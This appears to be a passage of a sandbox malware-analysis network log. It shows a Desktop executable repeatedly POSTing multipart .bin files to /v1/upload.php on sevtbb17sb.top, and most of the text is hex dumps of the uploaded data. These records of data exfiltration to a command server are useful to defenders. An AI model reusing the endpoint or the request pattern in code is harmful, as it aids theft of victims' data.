Oct 20, 2024 22:47:59.576538086 CEST	2472	OUT	Data Raw: b5 7e f0 dc 69 f7 83 2e 7d 3f 41 6d 36 ae 7c 0f 4a da 15 47 4c 4b b9 81 41 49 7d 61 10 f9 2a 46 a8 88 5f 95 c3 83 3a b7 a2 5a bb a8 bb c2 2a 28 34 06 6c 89 5d b7 d6 13 ba 88 49 06 88 39 97 34 99 eb 44 3f cb 9c 59 42 42 56 da a4 2f bf be 7f 3f 4b Data Ascii: ~i.}?Am6\|JGLKAI}aF_:Z(4l]I94D?YBBV/?KnHs&&}/2x/0&5LX3I_>"oBgQ2Q^ ;K7~!~4l?s+v0B61u[{C!{"nND
Oct 20, 2024 22:47:59.576611042 CEST	2472	OUT	Data Raw: 2a 38 49 81 dd 77 f2 93 98 f4 01 c9 56 a4 9d ae 0a 7a 82 98 d5 2f 63 d8 27 5a f5 2d 1b 25 30 37 d5 17 ed b2 bb 5b f1 cb 7b 33 3d 64 ec c4 2a 65 26 84 a6 73 e7 3a 0d 2c c4 03 7e 7c 9d 7b ee e3 1d e2 f2 78 3c 89 d6 16 65 b1 5c da 42 46 35 e2 17 b9 Data Ascii: 8IwVz/c'Z-%07[{3=de&s:,~\|{x<e\BF5gZ:Oy*M\|>tn>yC\'M]]}k9%j_7~hTla(A"fz_}uQ+Y;c5(
Oct 20, 2024 22:47:59.576641083 CEST	2472	OUT	Data Raw: f1 1e 4f f1 2b 9e 66 27 bb 51 d2 34 ea 2d 7f 71 e2 08 3c c5 35 31 73 90 d8 b8 43 34 b9 d4 b9 01 4d 82 8e 5d bc 98 60 27 93 08 85 33 55 7e 10 2d 3e e6 56 39 8e 08 58 ef f8 e7 4e a5 63 ed 41 5c 78 94 a0 9f 76 17 03 f3 06 12 99 a1 a5 33 aa e9 0b 04 Data Ascii: O+f'Q4-q<51sC4M]`'3U~->V9XNcA\xv3S)9C(>K8KUcj);b/M8D`2B->#"+PJ3PKDB{ihx 0W7%2Nc\|W3Fqrv_$
Oct 20, 2024 22:47:59.576700926 CEST	4944	OUT	Data Raw: 28 af 7f 97 ea a4 b2 2c 33 32 41 70 1b 0b d0 a2 13 3d 42 9a c2 db aa d9 9c 4b 41 3f 5a 27 45 cf 99 25 5d 8a 77 94 37 93 d7 a3 24 89 63 85 27 77 c6 52 a4 9a 2b b6 81 85 9b 34 b3 be e9 0a 2f ee 7e 24 4b d3 9e c9 b5 e3 8e 95 65 21 c1 30 6b b0 cb 17 Data Ascii: (,32Ap=BKA?Z'E%]w7$c'wR+4/~$Ke!0k.Vde0+3H6B'A)U:~RA~"\p!J_"VUE&]`j2oWoS%1y^KK}AX:_\K1?G;@Y0_7]jN
Oct 20, 2024 22:47:59.576735973 CEST	2472	OUT	Data Raw: 98 6e a0 4f d7 74 dc df 1b b2 d9 f8 4a d0 e3 5a eb eb ab d5 76 f6 e6 76 05 57 9f 28 6c 01 9a 0c 6d 74 57 30 78 10 e6 7a 4d 82 dd 0b ae b6 84 3b ab 74 2d c4 1e c2 9d 25 9f 84 1f 6b bd 58 47 77 0a 2d d0 e9 0f d7 3a 75 97 fd e7 ec 1b 55 83 52 5c 3d Data Ascii: nOtJZvvW(lmtW0xzM;t-%kXGw-:uUR\=m+MTu$bV_lU>,Gs0?)M3zb`2"dFe9JbU/R$BL$t>j>fP\4y8Eh^g<5mt7,W:
Oct 20, 2024 22:47:59.576762915 CEST	2472	OUT	Data Raw: 81 e3 0e 25 03 5a 42 e0 08 cd e1 bc 1f ca bf bc 31 3d a4 3b e6 c7 cd 15 11 49 98 6c be f3 e3 0d 01 98 14 32 21 00 63 84 02 44 f9 19 72 c2 85 f8 ce 7c 3f c4 0c 33 82 9b 96 a9 cc 06 73 9d bb 51 76 47 82 95 dd 1e 60 87 12 de d3 cf 3b eb f2 ee 73 02 Data Ascii: %ZB1=;Il2!cDr\|?3sQvG`;s1cw#/GT^>l.5S@Q[R(}-xMHg0P6/'<k\|Z(YbhC%ZHy#pb$hi `1C;.Jzv_u7
Oct 20, 2024 22:47:59.576864004 CEST	2472	OUT	Data Raw: 1f ae c3 aa e1 19 31 fc 46 51 61 52 7e 4e 08 72 e4 04 c6 eb a7 6a 89 32 45 48 64 7e 38 ed 7a 61 a2 b3 ea 6d 2e b6 28 49 6a e2 88 67 e4 9a 29 ad a8 f6 2c e1 10 37 c6 f5 4d 58 ed 2e cd 41 f3 3c 29 6b 41 c2 a2 e9 1b 46 b7 f5 62 c7 fc 06 d8 42 34 76 Data Ascii: 1FQaR~Nrj2EHd~8zam.(Ijg),7MX.A<)kAFbB4v"=I~agE}MD/@88-\CjuVwAw;Ra:wEFqEzx6<h+,(,ClN\|eZJo'bC
Oct 20, 2024 22:47:59.581044912 CEST	2472	OUT	Data Raw: 8c 02 0a fd 61 e7 a0 94 c1 ff 55 d7 73 d9 21 a4 96 91 5c 95 41 5b 56 ab 3e 8e 70 75 04 af e8 35 2b 97 fa 13 ce 5a e9 58 76 d4 28 a7 2d 00 9a df 1b 4e 3a 49 0e c0 98 43 83 ee d1 c3 de 00 fe 61 7b 95 c8 4c 35 23 8f f8 20 47 4a fd 44 eb ff 0d 3c c3 Data Ascii: aUs!\A[V>pu5+ZXv(-N:ICa{L5# GJD<{p$XnNkPeDE;=r'<BA\5axhuH, 3X":{Cl\V5o)f@zr[E^iNtEI4%>7* DX\pkM:MO

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49776	193.46.218.44	80	6356	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 22:48:01.180058956 CEST	335	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary35492427 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 62873 Host: sevtbb17sb.top
Oct 20, 2024 22:48:01.180129051 CEST	11124	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 33 35 34 39 32 34 32 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 52 69 72 Data Ascii: ------Boundary35492427Content-Disposition: form-data; name="file"; filename="Riruluwug.bin"Content-Type: application/octet-streamh/!Oz2<7\Onx)J^}^3[`"?{)p//mA%m`gf3@\|W`kG?trZl,*b.S
Oct 20, 2024 22:48:01.185113907 CEST	1236	OUT	Data Raw: 99 a4 bb ee 9f ea c2 86 7d 3c c4 e6 fb 6c 82 1a 51 77 ed 7c f7 a0 da ac 2c 76 4d 08 b0 02 37 43 c3 a7 68 76 c7 a4 3c 0e 7d 77 79 13 ca 6a c8 1c 65 e2 a5 fe b5 38 ec d0 c6 13 87 af a4 58 0a 11 49 0a f3 e4 34 84 47 73 31 4f 9a 11 5c 5b 1c fd 35 c6 Data Ascii: }<lQw\|,vM7Chv<}wyje8XI4Gs1O\[5U"%^ZpP1W"spHn-'m"uYM^^I/ee{L)Ivqy`Xopdf~=dtusnQm]-U6X*BR
Oct 20, 2024 22:48:01.185318947 CEST	2472	OUT	Data Raw: b5 7e f0 dc 69 f7 83 2e 7d 3f 41 6d 36 ae 7c 0f 4a da 15 47 4c 4b b9 81 41 49 7d 61 10 f9 2a 46 a8 88 5f 95 c3 83 3a b7 a2 5a bb a8 bb c2 2a 28 34 06 6c 89 5d b7 d6 13 ba 88 49 06 88 39 97 34 99 eb 44 3f cb 9c 59 42 42 56 da a4 2f bf be 7f 3f 4b Data Ascii: ~i.}?Am6\|JGLKAI}aF_:Z(4l]I94D?YBBV/?KnHs&&}/2x/0&5LX3I_>"oBgQ2Q^ ;K7~!~4l?s+v0B61u[{C!{"nND
Oct 20, 2024 22:48:01.185352087 CEST	2472	OUT	Data Raw: 2a 38 49 81 dd 77 f2 93 98 f4 01 c9 56 a4 9d ae 0a 7a 82 98 d5 2f 63 d8 27 5a f5 2d 1b 25 30 37 d5 17 ed b2 bb 5b f1 cb 7b 33 3d 64 ec c4 2a 65 26 84 a6 73 e7 3a 0d 2c c4 03 7e 7c 9d 7b ee e3 1d e2 f2 78 3c 89 d6 16 65 b1 5c da 42 46 35 e2 17 b9 Data Ascii: 8IwVz/c'Z-%07[{3=de&s:,~\|{x<e\BF5gZ:Oy*M\|>tn>yC\'M]]}k9%j_7~hTla(A"fz_}uQ+Y;c5(
Oct 20, 2024 22:48:01.185367107 CEST	2472	OUT	Data Raw: f1 1e 4f f1 2b 9e 66 27 bb 51 d2 34 ea 2d 7f 71 e2 08 3c c5 35 31 73 90 d8 b8 43 34 b9 d4 b9 01 4d 82 8e 5d bc 98 60 27 93 08 85 33 55 7e 10 2d 3e e6 56 39 8e 08 58 ef f8 e7 4e a5 63 ed 41 5c 78 94 a0 9f 76 17 03 f3 06 12 99 a1 a5 33 aa e9 0b 04 Data Ascii: O+f'Q4-q<51sC4M]`'3U~->V9XNcA\xv3S)9C(>K8KUcj);b/M8D`2B->#"+PJ3PKDB{ihx 0W7%2Nc\|W3Fqrv_$
Oct 20, 2024 22:48:01.185399055 CEST	2472	OUT	Data Raw: 28 af 7f 97 ea a4 b2 2c 33 32 41 70 1b 0b d0 a2 13 3d 42 9a c2 db aa d9 9c 4b 41 3f 5a 27 45 cf 99 25 5d 8a 77 94 37 93 d7 a3 24 89 63 85 27 77 c6 52 a4 9a 2b b6 81 85 9b 34 b3 be e9 0a 2f ee 7e 24 4b d3 9e c9 b5 e3 8e 95 65 21 c1 30 6b b0 cb 17 Data Ascii: (,32Ap=BKA?Z'E%]w7$c'wR+4/~$Ke!0k.Vde0+3H6B'A)U:~RA~"\p!J_"VUE&]`j2oWoS%1y^KK}AX:_\K1?G;@Y0_7]jN
Oct 20, 2024 22:48:01.185425997 CEST	2472	OUT	Data Raw: da 49 88 df e2 84 31 94 7b 0e 89 73 81 94 75 6a f7 59 05 f6 f0 3c 80 7a f4 2f bb 54 0f 64 59 b2 4f a8 aa a9 e4 45 d5 91 76 db 73 4a 89 90 d0 3b b9 0a 7e d1 5c 01 8c c6 e0 0b e9 80 e9 f8 27 7b 6e 51 ce 7f da 26 be c8 4a 7a 4d 30 6c 7e 5b b6 bf 92 Data Ascii: I1{sujY<z/TdYOEvsJ;~\'{nQ&JzM0l~[Jz<U!%j;yRANq9S$jK#a''7SkcV&9jxqWvBlEw=N-,mj@W8Ot1-+-OHHieIh"O]YJ+3
Oct 20, 2024 22:48:01.185447931 CEST	2472	OUT	Data Raw: 98 6e a0 4f d7 74 dc df 1b b2 d9 f8 4a d0 e3 5a eb eb ab d5 76 f6 e6 76 05 57 9f 28 6c 01 9a 0c 6d 74 57 30 78 10 e6 7a 4d 82 dd 0b ae b6 84 3b ab 74 2d c4 1e c2 9d 25 9f 84 1f 6b bd 58 47 77 0a 2d d0 e9 0f d7 3a 75 97 fd e7 ec 1b 55 83 52 5c 3d Data Ascii: nOtJZvvW(lmtW0xzM;t-%kXGw-:uUR\=m+MTu$bV_lU>,Gs0?)M3zb`2"dFe9JbU/R$BL$t>j>fP\4y8Eh^g<5mt7,W:
Oct 20, 2024 22:48:01.185492992 CEST	2472	OUT	Data Raw: 81 e3 0e 25 03 5a 42 e0 08 cd e1 bc 1f ca bf bc 31 3d a4 3b e6 c7 cd 15 11 49 98 6c be f3 e3 0d 01 98 14 32 21 00 63 84 02 44 f9 19 72 c2 85 f8 ce 7c 3f c4 0c 33 82 9b 96 a9 cc 06 73 9d bb 51 76 47 82 95 dd 1e 60 87 12 de d3 cf 3b eb f2 ee 73 02 Data Ascii: %ZB1=;Il2!cDr\|?3sQvG`;s1cw#/GT^>l.5S@Q[R(}-xMHg0P6/'<k\|Z(YbhC%ZHy#pb$hi `1C;.Jzv_u7
Oct 20, 2024 22:48:01.185540915 CEST	2472	OUT	Data Raw: 1f ae c3 aa e1 19 31 fc 46 51 61 52 7e 4e 08 72 e4 04 c6 eb a7 6a 89 32 45 48 64 7e 38 ed 7a 61 a2 b3 ea 6d 2e b6 28 49 6a e2 88 67 e4 9a 29 ad a8 f6 2c e1 10 37 c6 f5 4d 58 ed 2e cd 41 f3 3c 29 6b 41 c2 a2 e9 1b 46 b7 f5 62 c7 fc 06 d8 42 34 76 Data Ascii: 1FQaR~Nrj2EHd~8zam.(Ijg),7MX.A<)kAFbB4v"=I~agE}MD/@88-\CjuVwAw;Ra:wEFqEzx6<h+,(,ClN\|eZJo'bC

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49787	193.46.218.44	80	6356	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 22:48:03.789206028 CEST	335	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary35492427 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 62873 Host: sevtbb17sb.top
Oct 20, 2024 22:48:03.789302111 CEST	11124	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 33 35 34 39 32 34 32 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 52 69 72 Data Ascii: ------Boundary35492427Content-Disposition: form-data; name="file"; filename="Riruluwug.bin"Content-Type: application/octet-streamh/!Oz2<7\Onx)J^}^3[`"?{)p//mA%m`gf3@\|W`kG?trZl,*b.S
Oct 20, 2024 22:48:03.794159889 CEST	1236	OUT	Data Raw: 99 a4 bb ee 9f ea c2 86 7d 3c c4 e6 fb 6c 82 1a 51 77 ed 7c f7 a0 da ac 2c 76 4d 08 b0 02 37 43 c3 a7 68 76 c7 a4 3c 0e 7d 77 79 13 ca 6a c8 1c 65 e2 a5 fe b5 38 ec d0 c6 13 87 af a4 58 0a 11 49 0a f3 e4 34 84 47 73 31 4f 9a 11 5c 5b 1c fd 35 c6 Data Ascii: }<lQw\|,vM7Chv<}wyje8XI4Gs1O\[5U"%^ZpP1W"spHn-'m"uYM^^I/ee{L)Ivqy`Xopdf~=dtusnQm]-U6X*BR
Oct 20, 2024 22:48:03.794266939 CEST	2472	OUT	Data Raw: b5 7e f0 dc 69 f7 83 2e 7d 3f 41 6d 36 ae 7c 0f 4a da 15 47 4c 4b b9 81 41 49 7d 61 10 f9 2a 46 a8 88 5f 95 c3 83 3a b7 a2 5a bb a8 bb c2 2a 28 34 06 6c 89 5d b7 d6 13 ba 88 49 06 88 39 97 34 99 eb 44 3f cb 9c 59 42 42 56 da a4 2f bf be 7f 3f 4b Data Ascii: ~i.}?Am6\|JGLKAI}aF_:Z(4l]I94D?YBBV/?KnHs&&}/2x/0&5LX3I_>"oBgQ2Q^ ;K7~!~4l?s+v0B61u[{C!{"nND
Oct 20, 2024 22:48:03.794316053 CEST	2472	OUT	Data Raw: 2a 38 49 81 dd 77 f2 93 98 f4 01 c9 56 a4 9d ae 0a 7a 82 98 d5 2f 63 d8 27 5a f5 2d 1b 25 30 37 d5 17 ed b2 bb 5b f1 cb 7b 33 3d 64 ec c4 2a 65 26 84 a6 73 e7 3a 0d 2c c4 03 7e 7c 9d 7b ee e3 1d e2 f2 78 3c 89 d6 16 65 b1 5c da 42 46 35 e2 17 b9 Data Ascii: 8IwVz/c'Z-%07[{3=de&s:,~\|{x<e\BF5gZ:Oy*M\|>tn>yC\'M]]}k9%j_7~hTla(A"fz_}uQ+Y;c5(
Oct 20, 2024 22:48:03.794384003 CEST	2472	OUT	Data Raw: f1 1e 4f f1 2b 9e 66 27 bb 51 d2 34 ea 2d 7f 71 e2 08 3c c5 35 31 73 90 d8 b8 43 34 b9 d4 b9 01 4d 82 8e 5d bc 98 60 27 93 08 85 33 55 7e 10 2d 3e e6 56 39 8e 08 58 ef f8 e7 4e a5 63 ed 41 5c 78 94 a0 9f 76 17 03 f3 06 12 99 a1 a5 33 aa e9 0b 04 Data Ascii: O+f'Q4-q<51sC4M]`'3U~->V9XNcA\xv3S)9C(>K8KUcj);b/M8D`2B->#"+PJ3PKDB{ihx 0W7%2Nc\|W3Fqrv_$
Oct 20, 2024 22:48:03.794415951 CEST	2472	OUT	Data Raw: 28 af 7f 97 ea a4 b2 2c 33 32 41 70 1b 0b d0 a2 13 3d 42 9a c2 db aa d9 9c 4b 41 3f 5a 27 45 cf 99 25 5d 8a 77 94 37 93 d7 a3 24 89 63 85 27 77 c6 52 a4 9a 2b b6 81 85 9b 34 b3 be e9 0a 2f ee 7e 24 4b d3 9e c9 b5 e3 8e 95 65 21 c1 30 6b b0 cb 17 Data Ascii: (,32Ap=BKA?Z'E%]w7$c'wR+4/~$Ke!0k.Vde0+3H6B'A)U:~RA~"\p!J_"VUE&]`j2oWoS%1y^KK}AX:_\K1?G;@Y0_7]jN
Oct 20, 2024 22:48:03.794469118 CEST	2472	OUT	Data Raw: da 49 88 df e2 84 31 94 7b 0e 89 73 81 94 75 6a f7 59 05 f6 f0 3c 80 7a f4 2f bb 54 0f 64 59 b2 4f a8 aa a9 e4 45 d5 91 76 db 73 4a 89 90 d0 3b b9 0a 7e d1 5c 01 8c c6 e0 0b e9 80 e9 f8 27 7b 6e 51 ce 7f da 26 be c8 4a 7a 4d 30 6c 7e 5b b6 bf 92 Data Ascii: I1{sujY<z/TdYOEvsJ;~\'{nQ&JzM0l~[Jz<U!%j;yRANq9S$jK#a''7SkcV&9jxqWvBlEw=N-,mj@W8Ot1-+-OHHieIh"O]YJ+3
Oct 20, 2024 22:48:03.794533968 CEST	2472	OUT	Data Raw: 98 6e a0 4f d7 74 dc df 1b b2 d9 f8 4a d0 e3 5a eb eb ab d5 76 f6 e6 76 05 57 9f 28 6c 01 9a 0c 6d 74 57 30 78 10 e6 7a 4d 82 dd 0b ae b6 84 3b ab 74 2d c4 1e c2 9d 25 9f 84 1f 6b bd 58 47 77 0a 2d d0 e9 0f d7 3a 75 97 fd e7 ec 1b 55 83 52 5c 3d Data Ascii: nOtJZvvW(lmtW0xzM;t-%kXGw-:uUR\=m+MTu$bV_lU>,Gs0?)M3zb`2"dFe9JbU/R$BL$t>j>fP\4y8Eh^g<5mt7,W:
Oct 20, 2024 22:48:03.794559956 CEST	2472	OUT	Data Raw: 81 e3 0e 25 03 5a 42 e0 08 cd e1 bc 1f ca bf bc 31 3d a4 3b e6 c7 cd 15 11 49 98 6c be f3 e3 0d 01 98 14 32 21 00 63 84 02 44 f9 19 72 c2 85 f8 ce 7c 3f c4 0c 33 82 9b 96 a9 cc 06 73 9d bb 51 76 47 82 95 dd 1e 60 87 12 de d3 cf 3b eb f2 ee 73 02 Data Ascii: %ZB1=;Il2!cDr\|?3sQvG`;s1cw#/GT^>l.5S@Q[R(}-xMHg0P6/'<k\|Z(YbhC%ZHy#pb$hi `1C;.Jzv_u7
Oct 20, 2024 22:48:03.794686079 CEST	2472	OUT	Data Raw: 1f ae c3 aa e1 19 31 fc 46 51 61 52 7e 4e 08 72 e4 04 c6 eb a7 6a 89 32 45 48 64 7e 38 ed 7a 61 a2 b3 ea 6d 2e b6 28 49 6a e2 88 67 e4 9a 29 ad a8 f6 2c e1 10 37 c6 f5 4d 58 ed 2e cd 41 f3 3c 29 6b 41 c2 a2 e9 1b 46 b7 f5 62 c7 fc 06 d8 42 34 76 Data Ascii: 1FQaR~Nrj2EHd~8zam.(Ijg),7MX.A<)kAFbB4v"=I~agE}MD/@88-\CjuVwAw;Ra:wEFqEzx6<h+,(,ClN\|eZJo'bC
Oct 20, 2024 22:48:05.311197042 CEST	209	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 (Ubuntu) Date: Sun, 20 Oct 2024 20:48:05 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 2 Connection: close ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc" Data Raw: 4f 4b Data Ascii: OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49798	193.46.218.44	80	6356	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 22:48:06.540175915 CEST	335	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary85537434 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 29713 Host: sevtbb17sb.top
Oct 20, 2024 22:48:06.540247917 CEST	11124	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 38 35 35 33 37 34 33 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4d 61 78 Data Ascii: ------Boundary85537434Content-Disposition: form-data; name="file"; filename="Maxatayot.bin"Content-Type: application/octet-streamoIcvx_V&i4=~Yi]pjA<- )bYa,KpiNQT( UsDmogp1v5y
Oct 20, 2024 22:48:06.545324087 CEST	1236	OUT	Data Raw: ca 6d c4 97 b0 27 97 1f d5 92 55 8d 8f ed 0e 8f 8c 0f 52 44 08 b9 ac 63 09 1b c1 5e ef e9 44 2a 14 0e 11 76 83 44 41 49 ee b6 bd f0 9a 9a b6 33 6d b2 ac 71 8e f0 dd 7f 98 6c 92 74 62 b5 d6 7b 82 2f c2 ba 73 7b 60 ed fc a1 6d 76 a9 39 33 68 e0 df Data Ascii: m'URDc^DvDAI3mqltb{/s{`mv93h9?,.RZmDTqdcRZ9Gv7@&s>%e>.HV]2VqGgx)\m6lYHGCU=S!3&A^VJ$IUn
Oct 20, 2024 22:48:06.545347929 CEST	2472	OUT	Data Raw: 93 2b b0 a6 51 db e6 98 de a3 41 00 ae 73 77 41 b9 8e 4a 69 c1 a5 ce 86 99 cb 41 72 76 0d 34 a1 dd 11 01 80 cb 0a 7a ee a4 11 ad 37 b9 27 87 27 71 00 99 d3 cf 28 76 5b 37 d4 9d 7e fb c6 39 2b 62 5a b0 f5 1b 39 f0 30 8a a2 31 10 2c 2c 2b 51 02 2e Data Ascii: +QAswAJiArv4z7''q(v[7~9+bZ901,,+Q.pNDuzW<)BTGwqq*pIIm!!]Pf}EL#F-wVA0h '!5cY[54./1U?.3k`dtH>b_PX<)
Oct 20, 2024 22:48:06.545365095 CEST	2472	OUT	Data Raw: f1 21 e7 2f a0 8b de 92 9a ba 0a e9 4e 24 39 55 73 37 ee 8f 2e f3 d7 2b 26 4f d7 5d e6 87 0a 33 ad 4b da 50 a2 ce 6e 24 c9 9f 50 aa 90 ae fd ed 00 31 5b 92 14 94 fc 23 d9 8f 49 85 ff b5 63 0a 2c 44 80 af 73 ac 91 33 81 d2 5a cf 65 51 ae b1 ef 9c Data Ascii: !/N$9Us7.+&O]3KPn$P1[#Ic,Ds3ZeQuj#8dOo5<I&CdDUPAf9=P2ELV~.,ra+jBp]Q{pq;E:K*lnEq"J>V>{M-h;Q
Oct 20, 2024 22:48:06.545419931 CEST	2472	OUT	Data Raw: ca 9a 87 30 95 f7 0b 72 5f 9f f6 c7 51 86 83 d6 74 9e e1 4e 35 43 91 a0 2b 3f 43 72 c7 dd 62 39 c8 94 86 f9 ab b1 79 67 32 bb 0b bd d3 52 f6 7f 28 57 46 95 e6 71 b7 a0 4c 9c d2 00 d8 c8 26 ed 8b 61 17 01 a0 a8 7a 07 2b c6 85 2d ef 1f 06 48 fd b1 Data Ascii: 0r_QtN5C+?Crb9yg2R(WFqL&az+-H!#M[6?,_1!G1U?& ;1n`%$`WiFMY7vk@(Y4])T.Z{U4FG\|:@myJ}d8=PA<TX6H
Oct 20, 2024 22:48:06.545448065 CEST	2472	OUT	Data Raw: 36 08 84 94 1b 32 03 9d 68 e0 78 bf 78 8c a6 3c 61 e7 e2 e2 04 e8 49 9d 79 f8 54 e8 08 f1 c1 8a 01 9e 5a d5 db 84 86 55 41 b5 fb 0b ff 50 af 9d 9c d5 0d 5b d8 2c b6 fb 60 30 6a cc d3 ec 47 8a c8 e0 fd 66 21 80 97 aa 60 5a 62 a7 d6 30 69 fa c1 2d Data Ascii: 62hxx<aIyTZUAP[,`0jGf!`Zb0i-fXD IWZv^Vli-q]b$UtT-w(3X)eeo64z g:w88}dxN]3<F"'JqC^OUB
Oct 20, 2024 22:48:06.545480967 CEST	2472	OUT	Data Raw: 5a 27 a9 1b cb 5b 6b b7 d4 cd 11 bf 07 fb 0b f4 20 b9 b3 e3 9e 70 25 6a 38 02 68 dc 57 02 d0 79 e8 0c dc 25 bc 8a 47 dc 42 36 14 17 bc ff 36 29 d9 05 6e b5 40 f1 5c 92 bc bd b5 51 34 4d 06 1a bb 65 dc 19 35 5a 2f b0 b2 ec 1e 45 40 02 12 f5 7f 1f Data Ascii: Z'[k p%j8hWy%GB66)n@\Q4Me5Z/E@&E."4\|,u-0qD45MG}4DQ;\.2\=SS2iR~Pd]4(kWbBZ!D.?_{kUmV&hwyjCTv
Oct 20, 2024 22:48:06.545499086 CEST	2472	OUT	Data Raw: 6b d3 74 12 23 08 ec 82 30 81 e4 ed 73 78 a3 5e 20 7d e2 bb b5 2a bc 76 9c 6b c9 e8 27 e3 ad 5e 94 da 21 46 ab b5 8b 2c b1 4a b8 c2 85 3a 6c ff e0 fc 03 df 3d 59 c3 76 b7 7f 26 5a 10 97 3f af 13 9e 3b 69 ab 8c c1 f1 f5 d3 5a 78 f1 25 5e ea 6e 7c Data Ascii: kt#0sx^ }vk'^!F,J:l=Yv&Z?;iZx%^n\|QOF(^\|Ckf7L5P2[2G+ad(gsG.5.S;DV.~;%V=G]/ZL7i.^R9LQ
Oct 20, 2024 22:48:06.545536995 CEST	2521	OUT	Data Raw: 4d 94 29 ed 98 ef 23 7d 61 67 0c f8 4e 3b 0e e9 57 d0 2d 52 ee f8 3f fe 57 59 e6 57 5e 9f 88 ad b6 94 b7 4f f4 a0 5c 6e f5 4a 19 29 6d 02 3e 47 06 70 69 32 c3 e6 65 a7 1f 08 6c ad 2f a3 5a cb 72 f6 3d 75 33 b0 84 31 45 95 a2 06 7e 65 7d 62 d9 e0 Data Ascii: M)#}agN;W-R?WYW^O\nJ)m>Gpi2el/Zr=u31E~e}b0OXd=){7UBkZPG\zIRo_c Wi>p8y\pR=7(;99> :U_ :Q(79]{{GA&j-1cJZ*

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49808	193.46.218.44	80	6356	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 22:48:07.976784945 CEST	335	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary85537434 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 29713 Host: sevtbb17sb.top
Oct 20, 2024 22:48:07.976839066 CEST	11124	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 38 35 35 33 37 34 33 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4d 61 78 Data Ascii: ------Boundary85537434Content-Disposition: form-data; name="file"; filename="Maxatayot.bin"Content-Type: application/octet-streamoIcvx_V&i4=~Yi]pjA<- )bYa,KpiNQT( UsDmogp1v5y
Oct 20, 2024 22:48:07.981693029 CEST	1236	OUT	Data Raw: ca 6d c4 97 b0 27 97 1f d5 92 55 8d 8f ed 0e 8f 8c 0f 52 44 08 b9 ac 63 09 1b c1 5e ef e9 44 2a 14 0e 11 76 83 44 41 49 ee b6 bd f0 9a 9a b6 33 6d b2 ac 71 8e f0 dd 7f 98 6c 92 74 62 b5 d6 7b 82 2f c2 ba 73 7b 60 ed fc a1 6d 76 a9 39 33 68 e0 df Data Ascii: m'URDc^DvDAI3mqltb{/s{`mv93h9?,.RZmDTqdcRZ9Gv7@&s>%e>.HV]2VqGgx)\m6lYHGCU=S!3&A^VJ$IUn
Oct 20, 2024 22:48:07.981729031 CEST	2472	OUT	Data Raw: 93 2b b0 a6 51 db e6 98 de a3 41 00 ae 73 77 41 b9 8e 4a 69 c1 a5 ce 86 99 cb 41 72 76 0d 34 a1 dd 11 01 80 cb 0a 7a ee a4 11 ad 37 b9 27 87 27 71 00 99 d3 cf 28 76 5b 37 d4 9d 7e fb c6 39 2b 62 5a b0 f5 1b 39 f0 30 8a a2 31 10 2c 2c 2b 51 02 2e Data Ascii: +QAswAJiArv4z7''q(v[7~9+bZ901,,+Q.pNDuzW<)BTGwqq*pIIm!!]Pf}EL#F-wVA0h '!5cY[54./1U?.3k`dtH>b_PX<)
